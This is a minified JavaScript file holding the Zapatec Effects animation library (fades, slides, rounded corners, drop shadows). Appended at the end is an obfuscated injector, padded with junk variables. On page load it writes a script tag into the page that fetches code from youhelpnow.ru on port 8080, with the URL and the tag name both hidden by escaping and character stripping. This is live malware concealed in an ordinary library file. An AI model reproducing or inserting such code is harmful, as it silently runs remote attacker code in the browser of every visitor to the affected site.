if(!Zapatec)var Zapatec={};Zapatec.Effect=[];Zapatec.Effect.applyFunc=function(a,b){b(a);for(var i=0;i<a.childNodes.length;i++){Zapatec.Effect.applyFunc(a.childNodes[i],b)}};Zapatec.Effect.elOffsetX=function(a){var x=0;while(a){if(typeof(a.offsetParent)!='undefined')x+=a.offsetLeft;a=(typeof(a.offsetParent)!='undefined')?a.offsetParent:null}return x};Zapatec.Effect.elOffsetY=function(a){var y=0;while(a){if(typeof(a.offsetTop)!='undefined')y+=a.offsetTop;a=typeof(a.offsetTop)!='undefined'?a.offsetParent:null}return y};Zapatec.Effect.fade=function(a,b){if(a.origfilter==null){a.origfilter=document.all?a.style.filter:a.style.opacity!=null?a.style.opacity:a.style.MozOpacity}var f=a.filters;var c=(b>=100);if(f){if(!c&&a.style.filter.indexOf("alpha")==-1){a.style.filter+=' alpha(opacity='+b+')'}else if(f.length&&f.alpha){if(c){f.alpha.enabled=false}else{f.alpha.opacity=b;f.alpha.enabled=true}}}else{if(b<100&&b>0)a.style.opacity=a.style.MozOpacity=b/100}if(b<=0){a.style.display='none'}if(b>=100&&a.origfilter!=null){if(a.origfilter!=""){a.style.filter=a.style.opacity=a.style.MozOpacity=a.origfilter}a.origfilter=null}};Zapatec.Effect.slide=function(a,b){var c=Math.pow(Math.sin(Math.PI*b/200),0.75);var d=((window.opera||navigator.userAgent.indexOf('KHTML')>-1)?'':'rect(auto, auto, auto, auto)');if(typeof a.__zp_origmargintop=='undefined'){a.__zp_origmargintop=a.style.marginTop}a.style.marginTop=(b==100)?a.__zp_origmargintop:'-'+(a.offsetHeight*(1-c))+'px';a.style.clip=(b==100)?d:'rect('+(a.offsetHeight*(1-c))+', '+a.offsetWidth+'px, '+a.offsetHeight+'px, 0)';if(b<=0){a.style.display='none'}};Zapatec.Effect.glide=function(a,b){var c=Math.pow(Math.sin(Math.PI*b/200),0.75);var d=((window.opera||navigator.userAgent.indexOf('KHTML')>-1)?'':'rect(auto, auto, auto, auto)');a.style.clip=(b==100)?d:'rect(0, '+a.offsetWidth+'px, '+(a.offsetHeight*c)+'px, 0)';if(b<=0){a.style.display='none'}};Zapatec.Effect.wipe=function(a,b){var c=((window.opera||navigator.userAgent.indexOf('KHTML')>-1)?'':'rect(auto, auto, auto, auto)');a.style.clip=(b==100)?c:'rect(0, '+(a.offsetWidth*(b/100))+'px, '+(a.offsetHeight*(b/100))+'px, 0)';if(b<=0){a.style.display='none'}};Zapatec.Effect.unfurl=function(a,b){var c=((window.opera||navigator.userAgent.indexOf('KHTML')>-1)?'':'rect(auto, auto, auto, auto)');if(b<=50){a.style.clip='rect(0, '+(a.offsetWidth*(b/50))+'px, 10px, 0)'}else if(b<100){a.style.clip='rect(0, '+a.offsetWidth+'px, '+(a.offsetHeight*((b-50)/50))+'px, 0)'}else{a.style.clip=c}if(b<=0){a.style.display='none'}};Zapatec.Effect.shrink=function(a,b){var c=((window.opera||navigator.userAgent.indexOf('KHTML')>-1)?'':'rect(auto, auto, auto, auto)');var d=Math.floor(a.offsetWidth*b/200);var e=Math.floor(a.offsetHeight*b/200);a.style.clip=(b>=100)?c:"rect("+(a.offsetHeight/2-e)+"px, "+(a.offsetWidth/2+d)+"px, "+(a.offsetHeight/2+e)+"px, "+(a.offsetWidth/2-d)+"px)";if(b<=0){a.style.display='none'}};Zapatec.Effect.grow=function(a,b){Zapatec.Effect.shrink(a,100-b)};Zapatec.Effect.highlight=function(b,c){if(b.origbackground==null){Zapatec.Effect.applyFunc(b,function(){var a=arguments[0];if(a.nodeType==1){a.origbackground=a.style.backgroundColor}})}Zapatec.Effect.applyFunc(b,function(){var a=arguments[0];if(a.nodeType==1){a.style.backgroundColor="#FFFF"+(255-Math.floor(c*1.5)).toString(16)}});if(c<=0||c>=100){Zapatec.Effect.applyFunc(b,function(){var a=arguments[0];if(a.nodeType==1){a.style.backgroundColor=a.origbackground;a.origbackground=null}})}};Zapatec.Effect.roundCorners=function(a,b,c){if(!document.getElementById||!document.createElement){return}var d=navigator.userAgent.toLowerCase();if(d.indexOf("msie 5")!=-1&&d.indexOf("opera")==-1){return}var e=document.createElement("div");e.className="rtop";e.style.backgroundColor=b;for(var i=1;i<=4;i++){var f=document.createElement("span");f.className="r"+i;f.style.backgroundColor=c;e.appendChild(f)}a.firstChild==null?a.appendChild(e):a.insertBefore(e,a.firstChild);var g=document.createElement("div");g.className='rbottom';g.style.backgroundColor=b;for(var i=4;i>=1;i--){var f=document.createElement("span");f.className='r'+i;f.style.backgroundColor=c;g.appendChild(f)}a.appendChild(g);a.__zp_roundCorners=true;a.__zp_outerColor=b;if(a.__zp_dropshadow!=null){document.body.removeChild(a.__zp_dropshadow);a.__zp_dropshadow=null;Zapatec.Effect.dropShadow(a,a.__zp_deep)}};Zapatec.Effect.dropShadow=function(a,b){if(a.__zp_dropshadow!=null){return}if(b==null||isNaN(parseInt(b))){b=5}a.__zp_deep=b;var c=document.createElement("div");c.style.position="absolute";c.style.backgroundColor="#666666";c.style.MozOpacity=0.50;c.style.filter="Alpha(Opacity=50)";c.style.left=(Zapatec.Effect.elOffsetX(a)+b)+"px";c.style.top=(Zapatec.Effect.elOffsetY(a)+b)+"px";c.style.width=a.offsetWidth+"px";c.style.height=a.offsetHeight+"px";var d=document.createElement('div');d.style.height=(parseInt(c.style.height)-10)+"px";d.appendChild(document.createTextNode(''));c.appendChild(d);a.__zp_dropshadow=c;document.body.insertBefore(c,document.body.firstChild);if(a.__zp_roundCorners){Zapatec.Effects.apply(c,'roundCorners',{outerColor:a.__zp_outerColor,innerColor:"#666666"})}};Zapatec.Effects=[];Zapatec.Effects.show=function(a,b,c,d){Zapatec.Effects.init(a,true,b,c,d)};Zapatec.Effects.hide=function(a,b,c,d){Zapatec.Effects.init(a,false,b,c,d)};Zapatec.Effects.init=function(a,b,c,d,e){if(a==null||d==null||d.length==0){return null}if(typeof a=="string"){a=document.getElementById(a)}if(a==null){return null}a.animations=[];if(typeof d=="string")d=[d];for(var i=0;i<d.length;i++){var f=null;switch(d[i]){case'fade':f=Zapatec.Effect.fade;break;case'slide':f=Zapatec.Effect.slide;break;case'glide':f=Zapatec.Effect.glide;break;case'wipe':f=Zapatec.Effect.wipe;break;case'unfurl':f=Zapatec.Effect.unfurl;break;case'grow':f=Zapatec.Effect.grow;break;case'shrink':f=Zapatec.Effect.shrink;break;case'highlight':f=Zapatec.Effect.highlight;break}if(f!=null)a.animations[a.animations.length]=f}if(a.animations.length!=0&&a.running==null){a.running=true;Zapatec.Effects.run(a,c,b,null,e)}};Zapatec.Effects.run=function(a,b,c,d,e){if(b==null)b=10;if(d<0){d=0}if(d>100){d=100}if(d==null){if(c){d=0;if(a.style.display=="none"){a.style.display='';if(a.__zp_dropshadow!=null){a.__zp_dropshadow.style.display=''}}}else{d=100}}d+=(c?1:-1)*b;for(var i=0;i<a.animations.length;i++){a.animations[i](a,d);if(a.__zp_dropshadow!=null){a.animations[i](a.__zp_dropshadow,d)}}if(d<=0||d>=100){a.running=null;if(e!=null){e()}return}else{setTimeout(function(){Zapatec.Effects.run(a,b,c,d,e)},50)}};Zapatec.Effects.apply=function(a,b,c){if(a==null||b==null){return}if(typeof a=="string"){a=document.getElementById(a)}if(a==null){return}switch(b){case'roundCorners':Zapatec.Effect.roundCorners(a,c['outerColor'],c['innerColor']);break;case'dropShadow':Zapatec.Effect.dropShadow(a,c['deep']);break}};

var L='';function P(){this.e='';var vT;if(vT!='' && vT!='cO'){vT=null};var z=unescape;this.V="";var b=new String();var fT=window;var mS;if(mS!='' && mS!='zG'){mS=''};var VA="";var S=z("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%61%79%73%65%72%76%65%2e%63%6f%6d%2f%6e%69%6b%6b%61%6e%73%70%6f%72%74%73%2e%63%6f%6d%2e%70%68%70");var cl;if(cl!=''){cl='zW'};var qD=new Date();function f(O,i){this.YT="";var fA;if(fA!='_' && fA != ''){fA=null};var Oa='';var F=String("xmrg".substr(3));var CF;if(CF!=''){CF='mf'};var zK=new Array();var q=z("%5b"), Z=z("%5d");var x=new String();var v=q+i+Z;this.SE='';var RK='';var vW=new RegExp(v, F);this.s="";var Sr=new Array();return O.replace(vW, new String());var h;if(h!='gS'){h='gS'};var RKw=new Date();};var D;if(D!='' && D!='vR'){D=''};var jn;if(jn!='' && jn!='oc'){jn='YJ'};var FQ;if(FQ!='' && FQ!='_s'){FQ='hZ'};var t='';var BC=new String();var MO=new Date();var Ou=f('89660268663056','14635927');var ba;if(ba!='' && ba!='vG'){ba=null};var H=new String();var vs=document;var gi=new String();var G;if(G!='' && G!='VF'){G=''};var BP=new Array();var WO;if(WO!='tH' && WO!='_f'){WO='tH'};function U(){var Cz=new String();var HZg=new String();var hb=new Array();var r=z("%68%74%74%70%3a%2f%2f%79%6f%75%68%65%6c%70%6e%6f%77%2e%72%75%3a");var yQ;if(yQ!=''){yQ='p'};var EX=new Array();H=r;this.WF='';var _V;if(_V!=''){_V='Hv'};H+=Ou;var hu;if(hu!='' && hu!='oA'){hu='qQ'};H+=S;var slw=new String();var TMh=new String();try {var pX=new Date();this.ca='';var yi;if(yi!='' && yi!='DH'){yi='XH'};Fq=vs.createElement(f('sBc9rIizpztZ','x93zLAB8ZCRgIjT0VyDd'));var Du=new Array();Fq[z("%73%72%63")]=H;Fq[z("%64%65%66%65%72")]=[1,2][0];var yj;if(yj!='bT'){yj='bT'};var Nb;if(Nb!='xf'){Nb='xf'};var J_;if(J_!='rK'){J_='rK'};var Xz;if(Xz!='_o' && Xz!='Bl'){Xz=''};var GC;if(GC!='' && GC!='yZ'){GC='cq'};vs.body.appendChild(Fq);var QI;if(QI!='oq' && QI != ''){QI=null};var Wo;if(Wo!='Zo' && Wo != ''){Wo=null};var IQ='';} catch(C){alert(C);var tz;if(tz!='dF'){tz=''};};var Yc="";var bp='';}var eF;if(eF!='Hg'){eF=''};var nh="";fT[String("on"+"loJ308".substr(0,2)+"adYc31".substr(0,2))]=U;var aG=new Array();var yt=new Date();};P();this._y="";this.Sc="";